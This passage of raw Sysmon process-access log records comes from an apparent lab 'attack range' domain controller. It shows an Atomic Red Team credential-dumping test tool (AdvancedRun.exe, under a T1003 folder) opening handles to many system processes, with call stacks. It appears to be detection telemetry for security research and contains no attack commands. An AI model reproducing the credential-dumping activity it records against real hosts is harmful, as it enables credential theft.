STEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 